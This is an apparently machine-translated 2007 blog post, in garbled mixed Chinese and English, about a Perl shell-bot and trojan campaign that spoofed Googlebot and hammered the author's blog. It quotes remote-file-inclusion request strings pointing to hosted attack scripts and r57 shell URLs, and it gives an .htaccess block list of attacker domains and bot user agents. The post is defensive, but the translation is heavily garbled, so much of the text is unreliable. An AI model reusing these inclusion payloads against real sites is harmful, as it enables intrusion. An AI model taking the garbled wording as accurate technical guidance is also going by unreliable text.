大规模远程代码注射液作为Googlebot的-包欺骗的P erl的B OT＆木马

- Dec 12月
- 21 21
大规模远程代码注射液作为Googlebot的-包欺骗的P erl的B OT＆木马
张贴的诺亚方舟 8个月， 2周前。
Filed under Security & injection .提起下安全＆注射液。
- Increase text size 增加文字大小
- Decrease text size 减少文字大小
这在过去三天此博客是痛苦的DoS攻击。攻击仍然活着，现在我不认为他们会离开。
i cannot ，取缔这个BOT的直接，因为他们发送伪造的数据包 （包欺骗）作为Googlebot的 http://www.whois-search.com/whois/64.233.166.136 。 Im still looking for the right ISP.即时通讯仍追缉权的ISP 。
```
 OrgName: Google Inc. OrgID: GOGL Address: 1600 Amphitheatre Parkway City: Mountain View StateProv: CA PostalCode: 94043 Country: US orgname ： Google公司orgid ： gogl地址： 1600露天剧场百汇城市： Mountain View的stateprov ： CA有邮政编码： 94043国家：美国 
```
在一段时间内i封锁所有远程溪流从他们的随机东道国*. COM和“建造，营运及移交的Perl签字” ，但封锁是不会停止他们从锤击这个网站。我将派遣503 （服务不可用）的某些要求，因此，如果您有问题，访问本网站请稍后再回来检查。
Type of injections类型的注射液
有很多的URI参数，在我的日志（我将残疾人服务器日志-限制资源），他们可能拥有一个大型的库存检查名单，已知的细胞质雄性不育的脆弱性。我只能证实，它是一种blackhat徐垃圾邮件的BOT ，因为他们要求URI包括典型的order.php页。
```
 /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja  gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? /部/在WordPress /如何- -删除-在WordPress网在垃圾邮件注射感染由迈克-司法机构政务长gger-goro-class-mailphp/order.php / ？可湿性粉剂= http://hom3.t35 .com / xpl /哈克/ id.txt ？ /es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? /部/在WordPress / order.php / ？可湿性粉剂= http://hom3.t35.com/xpl/hack/id.txt ？ /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? / order.php ？可湿性粉剂= http://hom3.t35.com/xpl/hack/id.txt ？ 
```
查看以下来源，您需要排除的网站主机从您的防病毒程序。
- 的Perl / shellbot.b木马 -h ttp://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP中/ rst.s木马 -h ttp://hom3.t35.com/xpl/fidz
htaccess的封锁坏的代码喷油器和Perl的BOT （僵尸网络）
If you has similar problems.如果您也有类似的问题。你应该座以下的网域在您的htaccess的。
mod_setenvif
```
 SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1 SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1 SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1 SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1  <FilesMatch "(.*)"> Order Allow,Deny Allow from all Deny from env=codeinjector_ref Deny from env=shell_bots </FilesMatch> setenvifnocase referer “ ^的http:// （为www ） ？ t35 \ 。 com ”的codeinjector_ref = 1 setenvifnocase referer “ ^的http:// （为www ） ？ jorgevolio \ 。 com ”的codeinjector_ref = 1 setenvifnocase referer “ ^的http:// （为www ） ？ emabe \ 。 com “的codeinjector_ref = 1 setenvifnocase referer ” ^的http:// （为www ） ？ pawang \ 。在“ codeinjector_ref = 1 setenvifnocase referer ” ^的http:// （为www ） ？毛重金\ 。净“ codeinjector_ref = 1 setenvifnocase使用者代理” ^ libwww -的Perl * “ shell_bots = 1 setenvifnocase使用者代理” ^ amidalla * “ shell_bots = 1 <filesmatch "(.*)"> ，以便允许，否认允许从所有否认从包膜= codeinjector_ref否认从的Env = shell_bots < / filesmatch > 
```
如果u arent肯定，如果您的服务器支持mod_setenvif总结，它像下面的例子。
```
 <IfModule mod_setenvif.c> #...replace this line with the above code... <ifmodule mod_setenvif.c> ＃ ...取代，这符合上述代码... </IfModule> < / ifmodule > 
```
How to trap Perl Shell Bot如何陷阱的Perl壳建造，营运及移交
We need a pattern to trap this bots.我们需要一个模式的陷阱，这漫游。 certainly we knew that these bots :当然，我们知道，这些漫游器：
- doesn’t honor robot.txt不荣誉的robot.txt
- they crawl all subdirectory他们抓取所有的子目录
- they has a pattern URI request他们有一个模式，开放的我们的要求
现在我只创建子目录自动禁止（和其他一些东西）的基础上，他们的模式。张灼华的BOT将禁止过，因为他们不用荣誉的robot.txt 。
我会更新这个职位会不时作出修订。做检查相关的文章，就如何包欺骗和验证，开拓/欺诈包。
Recent Scan & Update最近的扫描与更新
The below list is automatically added.以下列出的是自动加入。
December 24, 2007 2007年12月24日
叶： 64.26.63.10参数： 登录= ， ？注： http://pawang.in/r57.txt
December 24, 2007 2007年12月24日
叶： 64.26.63.10参数： 迪尔= ， =注入登录 ： http://pawang.in/r57.txt ？？？？
December 25, 2007 2007年12月25日
叶： 59.158.128.138参数： P值 ， ： allinurl =注： http://gw-gold.net/jpg/pictures/test.txt
External Resources外部资源
- 包欺骗-h ttp://www.wireshark.org
- pcapdiff验证伪造数据包http://www.eff.org/testyourisp/pcapdiff/
About the Author关于作者
Tags: 标签：
- Amidalla , amidalla ，
- libwww-perl , libwww -的Perl ，
- owned , 国有，
- packet spoofing , 包欺骗，
- PHP Rst.S , PHP中 rst.s ，
- ShellBot.B , shellbot.b ，
- Trojan , 特洛伊木马病毒，
- wp 可湿性粉剂
- Rated 3额定3
- December 21, 2007 at 10:48 pm 2007年12月21日在下午10时48分
- February 16, 2008 at 3:05 am 2008年2月16日在上午03时05分
- 0.3
- url网址
- 没有反应， “ 大规模远程代码注射液作为Googlebot的-包欺骗的P erl的B OT＆木马”
  Trackback URL: 跟踪网址：使用跟踪RUI ↑ ，以平这篇文章。如果您的博客不支持trackbacks您可能会想要离开的评论。
- Comment Policy 评论政策
  重新：大规模远程代码注射液作为Googlebot的-包欺骗的P erl的B OT＆木马- '指导'↓
  大规模远程代码注射液作为Googlebot的-包欺骗的P erl的B OT＆木马k akkoi8 个月， 2周前5 网址
  下面的“代码”是旨在保护您和其他用户对本网站的。
  有关：您的评论应该是一个有见地的贡献的主题项目。让您的建设性的意见和有礼貌。
  没有广告或垃圾邮件：不要使用评论功能，以促进商业实体/产品，服务或联营公司的网站。你可以张贴连结，只要它的相关条目。
  继续按照法律：不要链接到有攻击性或非法内容的网站。不作任何诽谤或贬低的意见，甚至会损害声誉，一个人或组织。
  隐私权：不要张贴任何个人信息有关的自己或任何其他人-（即：地址，就业地点，电话或手机号码或电子邮件地址）。
  在为了保持这些经验愉快，有趣，我们所有的用户，我们要求您按照上述guidlines 。
  be the first to comment.成为第一位评论。
  请随时进行，询问问题，并告诉我们您的想法！定期和有见地的评论是最欢迎的。
“写的，如果你谈的一个好朋友（在前面的你的母亲） ” 。
.have your say 。您说

Name (required) 姓名（必填）
Email (required, will not be published) 电子邮件（必填，将不会被发表）
Website 网站
免责声明：任何内容，您后，您在此授予kakkoi该免版税的，不可撤销的，永久的，排他性和完全转授的许可使用，复制，修改，改编，出版，翻译，创作衍生作品，分发，执行和显示这些内容的全部或部分，世界各地，并把它在其他工程，以任何形式，媒体或技术，现在已知或以后开发的一些版权所有。

MySQL查询错误